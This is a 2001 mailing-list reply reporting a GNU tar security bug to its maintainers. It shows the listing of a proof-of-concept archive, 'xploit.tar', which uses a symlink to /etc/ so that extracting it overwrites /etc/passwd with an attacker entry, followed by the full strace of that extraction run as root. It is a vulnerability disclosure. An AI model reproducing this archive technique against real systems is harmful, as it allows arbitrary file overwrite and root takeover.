bug-gnu-utils
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Security bug: tar allows to overwrite arbitrary file when extracting


From: Mikulas Patocka
Subject: Re: Security bug: tar allows to overwrite arbitrary file when extracting
Date: Thu, 28 Jun 2001 11:30:48 +0200 (CEST)

> > From: Mikulas Patocka <address@hidden>
> > Date: Mon, 25 Jun 2001 18:11:36 +0200 (CEST)
> > 
> > Is this security bug? Or is it intended behaviour?
> 
> It is a security bug, and it is not the intended behavior.
> I could not reproduce the bug under Solaris 8, though.
> Perhaps there is a difference in the way the Linux kernel works?
> Can you investigate this?

tar tvf xploit.tar gives this result:

drwxr-xr-x root/root         0 2001-06-28 11:31:39 dir/
lrwxrwxrwx root/root         0 2001-06-28 11:31:39 dir/link -> /etc/
drwxr-xr-x root/root         0 2001-06-28 11:31:39 dir/
drwxr-xr-x root/root         0 2001-06-28 11:31:39 dir/link/
-rw-r--r-- root/root        37 2001-06-28 11:31:39 dir/link/passwd

Here is output of strace -o tr tar xvf xploit.tar

Mikulas

execve("/bin/tar", ["tar", "xvf", "xploit.tar"], [/* 23 vars */]) = 0
brk(0)                                  = 0x80696f8
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat(4, {st_mode=S_IFREG|0644, st_size=27021, ...}) = 0
mmap(0, 27021, PROT_READ, MAP_PRIVATE, 4, 0) = 0x4000b000
close(4)                                = 0
open("/lib/libc.so.6", O_RDONLY)        = 4
mmap(0, 4096, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40012000
munmap(0x40012000, 4096)                = 0
mmap(0, 672904, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40012000
mprotect(0x400a4000, 74888, PROT_NONE)  = 0
mmap(0x400a4000, 28672, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 
0x91000) = 0x400a4000
mmap(0x400ab000, 46216, PROT_READ|PROT_WRITE, 
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400ab000
close(4)                                = 0
munmap(0x4000b000, 27021)               = 0
personality(PER_LINUX)                  = 0
getpid()                                = 391
time(NULL)                              = 993720713
brk(0)                                  = 0x80696f8
brk(0x8069730)                          = 0x8069730
brk(0x806a000)                          = 0x806a000
sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}) = 0
geteuid()                               = 0
umask(0)                                = 022
brk(0x806d000)                          = 0x806d000
open(0xbffffdd6, O_RDONLY)              = 4
fstat(4, {st_mode=S_IFREG|0644, st_size=10240, ...}) = 0
read(4, "dir/\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 10240) = 10240
open("/etc/nsswitch.conf", O_RDONLY)    = 5
fstat(5, {st_mode=S_IFREG|0644, st_size=406, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 
0x4000b000
read(5, "# /etc/nsswitch.conf\n#\n# Examp"..., 4096) = 406
read(5, "", 4096)                       = 0
close(5)                                = 0
munmap(0x4000b000, 4096)                = 0
open("/etc/ld.so.cache", O_RDONLY)      = 5
fstat(5, {st_mode=S_IFREG|0644, st_size=27021, ...}) = 0
mmap(0, 27021, PROT_READ, MAP_PRIVATE, 5, 0) = 0x4000b000
close(5)                                = 0
open("/lib/libnss_compat.so.1", O_RDONLY) = 5
mmap(0, 4096, PROT_READ, MAP_PRIVATE, 5, 0) = 0x400b7000
munmap(0x400b7000, 4096)                = 0
mmap(0, 27436, PROT_READ|PROT_EXEC, MAP_PRIVATE, 5, 0) = 0x400b7000
mprotect(0x400bd000, 2860, PROT_NONE)   = 0
mmap(0x400bd000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 5, 0x5000) 
= 0x400bd000
close(5)                                = 0
open("/lib/libnsl.so.1", O_RDONLY)      = 5
mmap(0, 4096, PROT_READ, MAP_PRIVATE, 5, 0) = 0x400be000
munmap(0x400be000, 4096)                = 0
mmap(0, 22012, PROT_READ|PROT_EXEC, MAP_PRIVATE, 5, 0) = 0x400be000
mprotect(0x400c2000, 5628, PROT_NONE)   = 0
mmap(0x400c2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 5, 0x3000) 
= 0x400c2000
close(5)                                = 0
open("/lib/libnss_files.so.1", O_RDONLY) = 5
mmap(0, 4096, PROT_READ, MAP_PRIVATE, 5, 0) = 0x400c4000
brk(0x806e000)                          = 0x806e000
munmap(0x400c4000, 4096)                = 0
mmap(0, 32544, PROT_READ|PROT_EXEC, MAP_PRIVATE, 5, 0) = 0x400c4000
mprotect(0x400cb000, 3872, PROT_NONE)   = 0
mmap(0x400cb000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 5, 0x6000) 
= 0x400cb000
close(5)                                = 0
munmap(0x4000b000, 27021)               = 0
open("/etc/passwd", O_RDONLY)           = 5
fcntl(5, F_GETFD)                       = 0
fcntl(5, F_SETFD, FD_CLOEXEC)           = 0
fstat(5, {st_mode=S_IFREG|0644, st_size=1073, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 
0x4000b000
lseek(5, 0, SEEK_CUR)                   = 0
read(5, "root:x:0:0:Mikulas Patocka,,,,:/"..., 4096) = 1073
close(5)                                = 0
munmap(0x4000b000, 4096)                = 0
open("/etc/group", O_RDONLY)            = 5
fcntl(5, F_GETFD)                       = 0
fcntl(5, F_SETFD, FD_CLOEXEC)           = 0
fstat(5, {st_mode=S_IFREG|0644, st_size=655, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 
0x4000b000
lseek(5, 0, SEEK_CUR)                   = 0
read(5, "root::0:root\nbin::1:root,bin,da"..., 4096) = 655
close(5)                                = 0
munmap(0x4000b000, 4096)                = 0
fstat(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(4, 2), ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 
0x4000b000
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
write(1, "dir/\n", 5)                   = 5
mkdir("dir", 0755)                      = 0
write(1, "dir/link\n", 9)               = 9
symlink("/etc/", "dir/link")            = 0
write(1, "dir/\n", 5)                   = 5
utime("dir/", [101/06/28-11:31:53, 101/06/28-11:31:39]) = 0
chmod("dir/", 0755)                     = 0
chown("dir/", 0, 0)                     = 0
mkdir("dir", 0755)                      = -1 EEXIST (File exists)
rmdir("dir/")                           = -1 ENOTEMPTY (Directory not empty)
write(1, "dir/link/\n", 10)             = 10
mkdir("dir/link", 0755)                 = -1 EEXIST (File exists)
rmdir("dir/link/")                      = -1 ENOTEMPTY (Directory not empty)
write(1, "dir/link/passwd\n", 16)       = 16
open("dir/link/passwd", O_WRONLY|O_CREAT|O_EXCL, 0644) = -1 EEXIST (File exists)
rmdir("dir/link/passwd")                = -1 ENOTDIR (Not a directory)
unlink("dir/link/passwd")               = 0
open("dir/link/passwd", O_WRONLY|O_CREAT|O_EXCL, 0644) = 5
write(5, "r00t:0wn3d:0:0:31337 h4x0r:/:/bi"..., 37) = 37
close(5)                                = 0
utime("dir/link/passwd", [101/06/28-11:31:53, 101/06/28-11:31:39]) = 0
chown("dir/link/passwd", 0, 0)          = 0
close(4)                                = 0
close(1)                                = 0
munmap(0x4000b000, 4096)                = 0
_exit(0)                                = ?




reply via email to

[Prev in Thread] Current Thread [Next in Thread]